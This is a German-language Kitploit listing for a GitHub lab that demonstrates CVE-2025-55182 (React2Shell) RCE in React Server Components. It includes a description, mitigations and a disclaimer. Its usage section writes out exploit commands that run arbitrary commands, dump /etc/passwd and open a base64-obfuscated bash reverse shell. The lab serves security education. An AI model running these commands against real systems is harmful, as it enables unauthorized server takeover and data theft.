Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell PoC Labor | Kitploit
Tools/GitHubGitHub/alsaut1/react2shell-lab
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRemote-Access-ToolPayload-EntwicklungLabs & Praxis
GitHubalsaut1/react2shell-lab

react2shell-lab

74vor 9 MonatenNoch nicht geprüft

CVE-2025-55182 React2Shell PoC Labor

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell - CVE-2025-55182 Labor

Ein umfassendes Labor zur Demonstration und zum Testen der kritischen Schwachstelle CVE-2025-55182 in React Server Components.

⚠️ Nur zu Bildungszwecken

Dieses Repository ist vorgesehen für:

  • Sicherheitsforschung und -bildung
  • Verständnis von Schwachstellenmechanismen
  • Tests an eigenen Systemen
  • Vorbereitung auf Bug-Bounty-Jagd

Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Unbefugter Zugriff ist illegal.

🔴 Schwachstellendetails

  • CVE-ID: CVE-2025-55182
  • CVSS-Score: 10.0 (Kritisch)
  • Typ: Nicht authentifizierte Remote-Codeausführung (RCE)
  • Betroffene Komponenten:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Grundursache: Unsichere Deserialisierung im "Flight"-Protokoll von React Server Components

⚡ Fähigkeiten

✅ Beliebige Befehle ohne Authentifizierung ausführen
✅ Systemdateien lesen
✅ Dateien erstellen und ändern
✅ Reverse-Shell-Verbindungen herstellen
✅ Volle Serverkontrolle erlangen

🚀 Schnellstart

1. Installation

Tool herunterladen
root@kitploit:~
npm install --legacy-peer-deps
npm run dev

Der Server startet unter http://localhost:3000

2. Schwachstelle prüfen

root@kitploit:~
bash check-cve.sh

3. Exploits ausführen

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Reverse-Shell

root@kitploit:~
# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Projektstruktur

root@kitploit:~
├── app/              # Vulnerable Next.js application
├── exploit/          # Working PoC exploit
│   └── rce_final.py  # Main exploit script
├── check-cve.sh      # Automated vulnerability checker
├── package.json      # Vulnerable dependencies
└── README.md

🔧 Technische Details

Die Schwachstelle befindet sich in der Deserialisierungslogik von React Server Components-Payloads. Der Exploit nutzt Prototype Pollution, um über process.mainModule.require('child_process').execSync() beliebigen Code auszuführen.

Angriffsablauf

  1. Bösartige Multipart-Formulardaten erstellen
  2. An die verwundbare React-Anwendung senden
  3. Die unsichere Deserialisierung im "Flight"-Protokoll ausnutzen
  4. RCE auf dem Server erlangen

📊 Auswirkungen

  • Vertraulichkeit: HOCH (beliebige Dateien lesen)
  • Integrität: HOCH (Dateien ändern/erstellen)
  • Verfügbarkeit: HOCH (Denial-of-Service-Befehle ausführen)

✅ Gegenmaßnahmen

  1. React auf 19.2.1 oder höher aktualisieren
  2. Next.js auf 15.0.5+ oder 16.0.7+ aktualisieren
  3. Web-Application-Firewall-Regeln (WAF) bereitstellen
  4. Serverprotokolle auf Exploit-Versuche überwachen
  5. Laufzeitschutzmechanismen verwenden

📚 Referenzen

  • react2shell.com
  • CVE-2025-55182 Details
  • React-Sicherheitshinweis
  • CVSS-Rechner

⚖️ Rechtlicher Haftungsausschluss

Dieser Code wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Unbefugter Zugriff auf Computersysteme ist gesetzeswidrig, etwa nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen in anderen Rechtsordnungen.

Der Autor übernimmt keine Haftung für Missbrauch dieser Informationen.

🎓 Lernergebnisse

Nach der Arbeit mit diesem Labor werden Sie verstehen:

  • Wie unsichere Deserialisierungsschwachstellen funktionieren
  • Angriffstechniken mit Prototype Pollution
  • Die Architektur von React Server Components
  • RCE-Ausnutzungsmethoden
  • Ordnungsgemäße Praktiken zur Offenlegung von Schwachstellen